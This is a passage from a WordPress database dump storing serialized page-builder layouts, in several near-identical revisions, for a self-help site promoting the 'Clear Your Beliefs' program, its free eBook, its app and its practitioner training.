[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -25px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1231, 1703, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:603:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:872:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -15px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1232, 1704, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:603:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:871:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style=" margin-top: -9px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:658:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -25px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1233, 1705, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:560px; height:315px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="560" height="315" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: 